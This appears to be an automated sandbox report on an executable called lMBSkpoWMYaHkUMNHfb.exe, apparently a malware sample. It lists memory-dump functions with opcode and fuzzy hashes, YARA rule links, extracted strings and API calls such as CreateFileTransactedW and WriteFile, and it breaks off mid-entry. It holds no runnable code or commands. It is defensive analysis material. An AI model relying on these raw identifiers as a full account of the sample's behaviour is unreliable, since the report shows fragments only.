Instruction ID: df9186dba92ab391a28881171335032e4361836564cc80251de5a4269593d323
Opcode Fuzzy Hash: 196f2e79ab9d2f49806269d2aeeffd287af13220ab0cee901ce377ca19a1db94
Instruction Fuzzy Hash: 18510642B0F7C50FEB7647AC68711A96FA1DF9A26071D41FFD0C8CA1E7E848590A8382

Function 00007FFD9B890B85 Relevance: .1, Instructions: 134COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.1756107347.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9b890000_lMBSkpoWMYaHkUMNHfb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 92a9b30b76f47c13412c01ef7c49624f530822e1e80439c9925b57e63b53cd3e
Instruction ID: 5d46be17599d4fe19fe062e0d575d1ef297362f30b55ca9c6c155188415bcac5
Opcode Fuzzy Hash: 92a9b30b76f47c13412c01ef7c49624f530822e1e80439c9925b57e63b53cd3e
Instruction Fuzzy Hash: 38412861B19A494FDB99EB7888A5AB577E2EF98300B0541B6E01DC32E7DD28EC428341

Function 00007FFD9B890CDA Relevance: .1, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.1756107347.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9b890000_lMBSkpoWMYaHkUMNHfb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e12e183d3f575384ca41636153145ba728a031dd77444b39962f73de9bd02725
Instruction ID: 994cae5a21fec9ce22b7714850efeef5d3020c45310db66c410f416229188735
Opcode Fuzzy Hash: e12e183d3f575384ca41636153145ba728a031dd77444b39962f73de9bd02725
Instruction Fuzzy Hash: FD310B21B1DB440FEB59A76CA8166B97BD1EF99714F0001BFF59EC32C7DD2868028396

Function 00007FFD9B8950A9 Relevance: .1, Instructions: 104COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.1756107347.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9b890000_lMBSkpoWMYaHkUMNHfb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4c3a408e3e0a96a63811e1f89c4848ce417f933e5b3a5403a145858c7ed658ea
Instruction ID: b986355d2af3a14c7ac424d41fc205dbe1d24404d9ed18f63a08c22d44c6dd90
Opcode Fuzzy Hash: 4c3a408e3e0a96a63811e1f89c4848ce417f933e5b3a5403a145858c7ed658ea
Instruction Fuzzy Hash: D031F421B0E64D4FDB55EB6858255FC7BF1EF88200B0A01FBD049D72D3DE2859058392

Function 00007FFD9B890A76 Relevance: .1, Instructions: 94COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.1756107347.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9b890000_lMBSkpoWMYaHkUMNHfb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f8f0ec848b4de7e1af71833f070f590fd4aaef74294c55c8bcaf178c6a47b8ed
Instruction ID: 4bc4912c34c85f5ba143dc66b1cac14da04b860e844e523d56cc35881f3598b7
Opcode Fuzzy Hash: f8f0ec848b4de7e1af71833f070f590fd4aaef74294c55c8bcaf178c6a47b8ed
Instruction Fuzzy Hash: 2631B231A1951D8FEF65EBB8D4646E9BBF0FF18300F044576D409E31A2DA38A981CB51

Function 00007FFD9B892488 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.1756107347.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9b890000_lMBSkpoWMYaHkUMNHfb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 89e83c87636a9c6cf811a1da059056645b153d771929b26c47702efc39e06547
Instruction ID: 6196d50d55ec77b985608fc29e6ce9ae6d0b9806a23818afaea05822e2bbe6b8
Opcode Fuzzy Hash: 89e83c87636a9c6cf811a1da059056645b153d771929b26c47702efc39e06547
Instruction Fuzzy Hash: AA210331F0890D4BEF58EBACA8256FD77E1FB98310F15017BE41DD3285DE28A9424791

Function 00007FFD9B8909C1 Relevance: .1, Instructions: 90COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.1756107347.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9b890000_lMBSkpoWMYaHkUMNHfb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4750f20e94a62f857ff8948164a2caa57668127d56d4f45141926c64ab554870
Instruction ID: 4812a1118771485794020d379025f2e161e768467630ca821f46c35a111a5d89
Opcode Fuzzy Hash: 4750f20e94a62f857ff8948164a2caa57668127d56d4f45141926c64ab554870
Instruction Fuzzy Hash: A711D512B2ED4F0BEBA8A7E918752B53EC1DF99A10B46417BD40DC21A7DD18A9464381

Function 00007FFD9B89089D Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.1756107347.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9b890000_lMBSkpoWMYaHkUMNHfb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f31fb5b41e1fb35993e7f0e076418da7df0ac99a940233a8cbe0bb750765c2e
Instruction ID: f8bc6af5a283f4d2ac5e0011be1e4338dcec61e1d60e3d3947cbc5258218d4b6
Opcode Fuzzy Hash: 9f31fb5b41e1fb35993e7f0e076418da7df0ac99a940233a8cbe0bb750765c2e
Instruction Fuzzy Hash: B2110A3171DB8D0FDB95E76884641A97FE0EF99250F0505BFE08DD71A2DD19A9428341

Function 00007FFD9B8909E0 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.1756107347.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9b890000_lMBSkpoWMYaHkUMNHfb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 14cec09ba029317585c1074ea2c3c1c141c210c7284748e406927efb01074a9f
Instruction ID: 9fddd0c9f7e6b77f92995b26c2be0a994411348210f5e683fd28dd4ca1d1ff73
Opcode Fuzzy Hash: 14cec09ba029317585c1074ea2c3c1c141c210c7284748e406927efb01074a9f
Instruction Fuzzy Hash: 6A01D812B2ED0F0AEAF8669D24656B629C5DFDCB51B41013AD50DC2196DD18AD4643C1

Function 00007FFD9B890E39 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.1756107347.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9b890000_lMBSkpoWMYaHkUMNHfb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4206927f5fe07c3906d3e46545b2a091ebcde2de82b55266bd07e3f960f87135
Instruction ID: 7308649231cf7968e659bbe23fcbae424d019255b0acd06d76184d9257329b9f
Opcode Fuzzy Hash: 4206927f5fe07c3906d3e46545b2a091ebcde2de82b55266bd07e3f960f87135
Instruction Fuzzy Hash: 5C01DB20B0E7C94FE747E37898A96B47FD1AF87215B1A41F6E04CCB0B7CA584986C342

Function 00007FFD9B894F11 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.1756107347.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9b890000_lMBSkpoWMYaHkUMNHfb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7261300faef979d3083c5198d4838292969ee3fd3a9800e598579c2d6d49f12f
Instruction ID: b3d09627ce65849ea3892bb8070519a01e118a28aa4eaa01a986c18e37210b32
Opcode Fuzzy Hash: 7261300faef979d3083c5198d4838292969ee3fd3a9800e598579c2d6d49f12f
Instruction Fuzzy Hash: B801F920B0E1870AEB3D53B854712F82F51DF85354F0A02F9D45DCA1F7DD5D19968391

Function 00007FFD9B89518D Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.1756107347.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9b890000_lMBSkpoWMYaHkUMNHfb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7a20c1b686a40360d76e0fcf9fb4d3af6cd07142f3b3d58e94054d93042ba4f0
Instruction ID: c8fd77828d07beb84c6ec91a5be5dd261a72e922689124213f0c32e241db5631
Opcode Fuzzy Hash: 7a20c1b686a40360d76e0fcf9fb4d3af6cd07142f3b3d58e94054d93042ba4f0
Instruction Fuzzy Hash: F7F0A435F0550E4BEF64EB9CA8651FD77F1EB88310B150475D409E3295DE28AA428791

Function 00007FFD9B890DF6 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.1756107347.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9b890000_lMBSkpoWMYaHkUMNHfb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9c62612a143e82aa9d21e16ec83c75f74d862a99449340e2c746fb5a880125f0
Instruction ID: d34de4541222bce8b47817cd99104d4af60ea6c2b7be48b394d055aaf25b327b
Opcode Fuzzy Hash: 9c62612a143e82aa9d21e16ec83c75f74d862a99449340e2c746fb5a880125f0
Instruction Fuzzy Hash: 7EE02B72A0E64C1EFB48AA5DFC17CF67B98DA87234B00015FF19DC1163E11265638355

Function 00007FFD9B894D65 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.1756107347.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9b890000_lMBSkpoWMYaHkUMNHfb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 19d816ac6dae5c71f8f716384c0fe633e8f4424230188708a55358fbb7574a0c
Instruction ID: de52c29ebaafa3312790f796964a2e13c2d03e62bfc6d7796b2f433ea6bc6f89
Opcode Fuzzy Hash: 19d816ac6dae5c71f8f716384c0fe633e8f4424230188708a55358fbb7574a0c
Instruction Fuzzy Hash: 86E0C63290EA0C8BEF68AB98AC202E83BA0FF4C308F0501AEE00CC3290D3325A50C340

Function 00007FFD9B893C81 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.1756107347.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9b890000_lMBSkpoWMYaHkUMNHfb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0c1238a40158d63acc151d34183f2dee9eeda93bae4de8c84179ac2a626a64a9
Instruction ID: 68b27b587a78fd9b38995e4618e6988df3d7fd965a5898f6abea6da89e9c5fd6
Opcode Fuzzy Hash: 0c1238a40158d63acc151d34183f2dee9eeda93bae4de8c84179ac2a626a64a9
Instruction Fuzzy Hash: 91E0DF35A5EE0C6BDB24AB5DBC206897AE1FB8C308F0102AAE45CC3191D7265765C301

Function 00007FFD9B894EF0 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.1756107347.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9b890000_lMBSkpoWMYaHkUMNHfb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6bc06d9ee9de60e576fe49e1c831c12c1ec8cebd4a57192a3792eb2d5ec3c218
Instruction ID: 08ed3845212a34f4eb15660af497cce8ba8960d2d8680bea96a18c053e9e7a7d
Opcode Fuzzy Hash: 6bc06d9ee9de60e576fe49e1c831c12c1ec8cebd4a57192a3792eb2d5ec3c218
Instruction Fuzzy Hash: 70D0C95194F7D54FCB1352BA1C390847F70AE0741074E82EBC4C4CB6E3D48D498A8322

Function 00007FFD9B890CC0 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.1756107347.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9b890000_lMBSkpoWMYaHkUMNHfb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4b11db8d9618d4f591a0e245b384cd13b510080f59676afac58303d9d50b536
Instruction ID: b27ea76ed75f75138897d4e9172e0d7637fed6f4dc74fbc6868529ee36b9c12a
Opcode Fuzzy Hash: a4b11db8d9618d4f591a0e245b384cd13b510080f59676afac58303d9d50b536
Instruction Fuzzy Hash: C5C02B13B8AD0E098B0C6058BC40CE1F380C7401303400AB3C40AC204CEC2B94C20340

Function 00007FFD9B8906B9 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.1756107347.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9b890000_lMBSkpoWMYaHkUMNHfb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 38b6e79657ca301eb0675c7a84daae77f961e0f2ad34251738f6f94d9f654078
Instruction ID: 9cb7f907f6b238c9d568ed5f40396e7ef9f7f4c57eaa59973ee52829cb911a31
Opcode Fuzzy Hash: 38b6e79657ca301eb0675c7a84daae77f961e0f2ad34251738f6f94d9f654078
Instruction Fuzzy Hash: DAB0128180F3D159D717227428700C63E540D0300931D01D7E0D5850E3A804804C4105

Non-executed Functions

Function 00007FFD9B8906D0 Relevance: 5.2, Strings: 4, Instructions: 217COMMON

Download Yara Rule

Strings

=N_^, xrefs: 00007FFD9B890701
N_^, xrefs: 00007FFD9B8906C2
N_^, xrefs: 00007FFD9B890712
N_^, xrefs: 00007FFD9B890722

Memory Dump Source

Source File: 00000019.00000002.1756107347.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9b890000_lMBSkpoWMYaHkUMNHfb.jbxd

Similarity

API ID:
String ID: =N_^$N_^$N_^$N_^
API String ID: 0-725873353
Opcode ID: 72d99eb55d1461084682288a255c80203e934f332b5aa5dabaa986ef5a289ecd
Instruction ID: 3f6f36e19a1254b81af255094add857986378928b4b27a71385e884d7761b25f
Opcode Fuzzy Hash: 72d99eb55d1461084682288a255c80203e934f332b5aa5dabaa986ef5a289ecd
Instruction Fuzzy Hash: 02512543F1F6D65BEB2253AC6C750F92F90DF96B65B1A00FBD0D88A0E3980966068381

Analysis Process: lMBSkpoWMYaHkUMNHfb.exePID: 7464, Parent PID: 2580COMMON

Execution Graph

Execution Coverage:	15%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	109
Total number of Limit Nodes:	6

Executed Functions

Function 00007FFD9BC10726 Relevance: 4.0, Strings: 3, Instructions: 262
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

h(3, xrefs: 00007FFD9BC1087B
h(3, xrefs: 00007FFD9BC108F1
h(3, xrefs: 00007FFD9BC1093D

Memory Dump Source

Source File: 0000001E.00000002.1805728239.00007FFD9BC10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ffd9bc10000_lMBSkpoWMYaHkUMNHfb.jbxd

Similarity

API ID:
String ID: h(3$h(3$h(3
API String ID: 0-3801388357
Opcode ID: f1709d71c3bfab788f7e1e5ff940ca1f9c0b5a6c927d67544a0dcf5cfc08d94e
Instruction ID: 3e1bafd87376e1c8753e5e228652b11ef705f2082627a331956e508ef8b6973d
Opcode Fuzzy Hash: f1709d71c3bfab788f7e1e5ff940ca1f9c0b5a6c927d67544a0dcf5cfc08d94e
Instruction Fuzzy Hash: 4A815531B0E74A8FF3389A68847517977E0EF51B10F16117EE08AD72A3DD28A9028B91

Function 00007FFD9BC150D6 Relevance: 4.0, Strings: 3, Instructions: 257
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

h(3, xrefs: 00007FFD9BC152E2
h(3, xrefs: 00007FFD9BC1522B
h(3, xrefs: 00007FFD9BC15296

Memory Dump Source

Source File: 0000001E.00000002.1805728239.00007FFD9BC10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ffd9bc10000_lMBSkpoWMYaHkUMNHfb.jbxd

Similarity

API ID:
String ID: h(3$h(3$h(3
API String ID: 0-3801388357
Opcode ID: 605f6a99d525a782885be9344b2004c616df30286ac9b7b4b20fe333d27ff7a5
Instruction ID: e2f55444f473bef04e97347da9595013f78e026de871b731cae907b16853eca9
Opcode Fuzzy Hash: 605f6a99d525a782885be9344b2004c616df30286ac9b7b4b20fe333d27ff7a5
Instruction Fuzzy Hash: 6F816732B0EB0A8FE3399A78946557D77E0EF46315B26017ED08ED71E3DE28B5028741

Function 00007FFD9BC16A61 Relevance: 4.0, Strings: 3, Instructions: 219
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

h(3, xrefs: 00007FFD9BC16C90
h(3, xrefs: 00007FFD9BC16BF7
h(3, xrefs: 00007FFD9BC16B96

Memory Dump Source

Source File: 0000001E.00000002.1805728239.00007FFD9BC10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ffd9bc10000_lMBSkpoWMYaHkUMNHfb.jbxd

Similarity

API ID:
String ID: h(3$h(3$h(3
API String ID: 0-3801388357
Opcode ID: ef9bd66d47597e6529c5b48c3e3fec5ebde0fdecb5385cd3a976e0be72fd9b27
Instruction ID: 40dcb10fd90f5ddef1da3605922015d72fe10a92393440203a23a2382f55fa40
Opcode Fuzzy Hash: ef9bd66d47597e6529c5b48c3e3fec5ebde0fdecb5385cd3a976e0be72fd9b27
Instruction Fuzzy Hash: EC81E230A0AB4E8FE364DB64C4A467677E1FF45304F51997EE48AC7AA2CB34B941C740

Function 00007FFD9BC12981 Relevance: 2.9, Strings: 2, Instructions: 410
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

h(3, xrefs: 00007FFD9BC12AB6
h(3, xrefs: 00007FFD9BC12B17

Memory Dump Source

Source File: 0000001E.00000002.1805728239.00007FFD9BC10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ffd9bc10000_lMBSkpoWMYaHkUMNHfb.jbxd

Similarity

API ID:
String ID: h(3$h(3
API String ID: 0-3297585916
Opcode ID: 53ea30376b93abf674143486cb6000da20438836c3c8f1be5c0c655ef1d2ec90
Instruction ID: 2aa805142b560e316010c84f773b10b6ebc3fec9b0c179e2435023baa386963a
Opcode Fuzzy Hash: 53ea30376b93abf674143486cb6000da20438836c3c8f1be5c0c655ef1d2ec90
Instruction Fuzzy Hash: 3BE10734B0EB0A4FE378DBA8D4A057977E1FF44308B11557EC48BCB6A2DA29B942C741

Function 00007FFD9BC111F2 Relevance: 2.8, Strings: 2, Instructions: 322
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

h(3, xrefs: 00007FFD9BC11418
h(3, xrefs: 00007FFD9BC114A1

Memory Dump Source

Source File: 0000001E.00000002.1805728239.00007FFD9BC10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ffd9bc10000_lMBSkpoWMYaHkUMNHfb.jbxd

Similarity

API ID:
String ID: h(3$h(3
API String ID: 0-3297585916
Opcode ID: 96bd94305c8876164e7f19486f82aee5199883c57d5b905d7ef6bacc829f7775
Instruction ID: 25a50b80e442e42501b53a0b44f6dd54e65accfc7cc7899362d0fa0cc8025106
Opcode Fuzzy Hash: 96bd94305c8876164e7f19486f82aee5199883c57d5b905d7ef6bacc829f7775
Instruction Fuzzy Hash: 7DC1E330B0EA4A8FE759DF68C0A06B8B7A1FF59300F555179D04ECBA96DB38B951C780

Function 00007FFD9BC10D50 Relevance: 2.6, Strings: 2, Instructions: 63
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

h(3, xrefs: 00007FFD9BC10DE6
h(3, xrefs: 00007FFD9BC10DA2

Memory Dump Source

Source File: 0000001E.00000002.1805728239.00007FFD9BC10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ffd9bc10000_lMBSkpoWMYaHkUMNHfb.jbxd

Similarity

API ID:
String ID: h(3$h(3
API String ID: 0-3297585916
Opcode ID: c042ac061fd83e3939d8905ab97a85a3eb6c675df4c1a0aa8cab39a8abba076b
Instruction ID: a945674033eb365e2f51965225c4e8dc85e60ad15bb8f39f857607d714171719
Opcode Fuzzy Hash: c042ac061fd83e3939d8905ab97a85a3eb6c675df4c1a0aa8cab39a8abba076b
Instruction Fuzzy Hash: FE11E732B09B0E5FE768FB6584219FA73A0FF54355F00463AE44EC75E3DE28B5458290

Function 00007FFD9BC10BCE Relevance: 2.6, Strings: 2, Instructions: 59
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

h(3, xrefs: 00007FFD9BC10D1C
h(3, xrefs: 00007FFD9BC10DA2

Memory Dump Source

Source File: 0000001E.00000002.1805728239.00007FFD9BC10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ffd9bc10000_lMBSkpoWMYaHkUMNHfb.jbxd

Similarity

API ID:
String ID: h(3$h(3
API String ID: 0-3297585916
Opcode ID: 0176bfc76154cc8f4af4047bebff0c66cf5a25cb43560b714857c37fd8292f8c
Instruction ID: b1f4cf6ce34c77b40502f777eada3ca8dccdd035b2429fec67e12a1b06072743
Opcode Fuzzy Hash: 0176bfc76154cc8f4af4047bebff0c66cf5a25cb43560b714857c37fd8292f8c
Instruction Fuzzy Hash: B311483270A60F8FE724AB98D4257F93390EF65355F11413BE809CB2E2DE287540C780

Function 00007FFD9BC1556E Relevance: 2.6, Strings: 2, Instructions: 59
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

h(3, xrefs: 00007FFD9BC15742
h(3, xrefs: 00007FFD9BC156BC

Memory Dump Source

Source File: 0000001E.00000002.1805728239.00007FFD9BC10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ffd9bc10000_lMBSkpoWMYaHkUMNHfb.jbxd

Similarity

API ID:
String ID: h(3$h(3
API String ID: 0-3297585916
Opcode ID: f659d0041b6e4f3054d8d2b3e0314e5bc1e35f979f3fe99475755b7342d2eb88
Instruction ID: b3e0238fc3a9891009e87a39b03cc2a5b7df8a3f6f333782f3fd7bb5b3d8ff5f
Opcode Fuzzy Hash: f659d0041b6e4f3054d8d2b3e0314e5bc1e35f979f3fe99475755b7342d2eb88
Instruction Fuzzy Hash: 9411483170660F8FE7259A54D4657F93390EF64355F11453BD519C72E2DE28B94087D0

Function 00007FFD9BAA8B98 Relevance: 1.9, APIs: 1, Instructions: 403
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemInfo.KERNELBASE ref: 00007FFD9BAAAF9F

Memory Dump Source

Source File: 0000001E.00000002.1804322807.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ffd9baa0000_lMBSkpoWMYaHkUMNHfb.jbxd

Similarity

API ID: InfoSystem
String ID:
API String ID: 31276548-0
Opcode ID: 2ce5f066a1922c82006e6789c9d282aeb3544f18443c17b573b36d332b0d7410
Instruction ID: 14f1b488be815e7b471b9a2f9b0e61f5c3bd003f7da5a2f5ad848f6a1ef498dc
Opcode Fuzzy Hash: 2ce5f066a1922c82006e6789c9d282aeb3544f18443c17b573b36d332b0d7410
Instruction Fuzzy Hash: 6CB13531B0DE0D0FE7B8DB58D4657B977D2EB99321F05423ED04EC32A2DEA5A9028791

Function 00007FFD9BB05CE0 Relevance: 1.8, APIs: 1, Instructions: 332
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000001E.00000002.1804322807.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ffd9baa0000_lMBSkpoWMYaHkUMNHfb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1f67a787ee007b198ac4d9582e5aa98204ef69eebc87065085dd4d6125ff7fb0
Instruction ID: 81c92e0a774dd816e28306ab736fa25de4b7abea46467c457d934e2d52a7fd78
Opcode Fuzzy Hash: 1f67a787ee007b198ac4d9582e5aa98204ef69eebc87065085dd4d6125ff7fb0
Instruction Fuzzy Hash: 0891D871B1DA4D4FEB6C9E5C98656B977D1FF98314F04027EE08EC32E6CE24A8068781

Function 00007FFD9BC15D7F Relevance: 1.7, Strings: 1, Instructions: 430
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

h(3, xrefs: 00007FFD9BC160A0

Memory Dump Source

Source File: 0000001E.00000002.1805728239.00007FFD9BC10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ffd9bc10000_lMBSkpoWMYaHkUMNHfb.jbxd

Similarity

API ID:
String ID: h(3
API String ID: 0-897801247
Opcode ID: 3c74969c5bd9584829304f2b32161ac75c4011a97fcc76a948331c63581ee107
Instruction ID: 6fd073f070162c677f2c971c0bb01282c73270c36972b76a51b2beb8a876b070
Opcode Fuzzy Hash: 3c74969c5bd9584829304f2b32161ac75c4011a97fcc76a948331c63581ee107
Instruction Fuzzy Hash: 08F1D6306195598FEB58CF58C4E06B837A1FF45310B5556BDD84ECB69BCA38F982CB80

Function 00007FFD9BAA9D6E Relevance: 1.7, APIs: 1, Instructions: 168
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileTransactedW.KERNEL32 ref: 00007FFD9BAA9E99

Memory Dump Source

Source File: 0000001E.00000002.1804322807.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ffd9baa0000_lMBSkpoWMYaHkUMNHfb.jbxd

Similarity

API ID: CreateFileTransacted
String ID:
API String ID: 2149338676-0
Opcode ID: 57f1ecd7d3a541c57c95046a6b95f8a340aedae852ecd679b8bd3445f4377571
Instruction ID: 16a30549bcd6aa54bb25a8347d384dc023ef1501a112e7161885b653f76df756
Opcode Fuzzy Hash: 57f1ecd7d3a541c57c95046a6b95f8a340aedae852ecd679b8bd3445f4377571
Instruction Fuzzy Hash: 0951F63090DB988FDB55DF58D845AA97BF0EF5A320F1442AFE089D3252CB74A841CB82

Function 00007FFD9BAA9EDD Relevance: 1.6, APIs: 1, Instructions: 132fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE ref: 00007FFD9BAA9FB7

Memory Dump Source

Source File: 0000001E.00000002.1804322807.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ffd9baa0000_lMBSkpoWMYaHkUMNHfb.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 8584e2c51e414fc1f16a3c78f83301b99e17ce8aeeedd616d52dcc9a42150ab9
Instruction ID: f871607809cd6e6b8d061855ca17245f436b455bd93ccd6dd43abc435baa010a
Opcode Fuzzy Hash: 8584e2c51e414fc1f16a3c78f83301b99e17ce8aeeedd616d52dcc9a42150ab9
Instruction Fuzzy Hash: C941AE3190CA4C8FDB58DF98D8596B9BBE1FB99321F04826ED049D3292CB74A845CB81

Function 00007FFD9BAAAF18 Relevance: 1.6, APIs: 1, Instructions: 95COMMON

